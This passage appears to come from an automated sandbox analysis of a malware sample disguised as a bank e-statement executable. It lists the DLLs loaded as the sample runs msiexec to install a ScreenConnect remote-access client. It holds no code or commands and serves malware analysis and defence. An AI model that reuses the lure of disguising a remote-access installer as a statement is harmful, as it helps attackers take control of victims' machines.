                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: dwrite.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
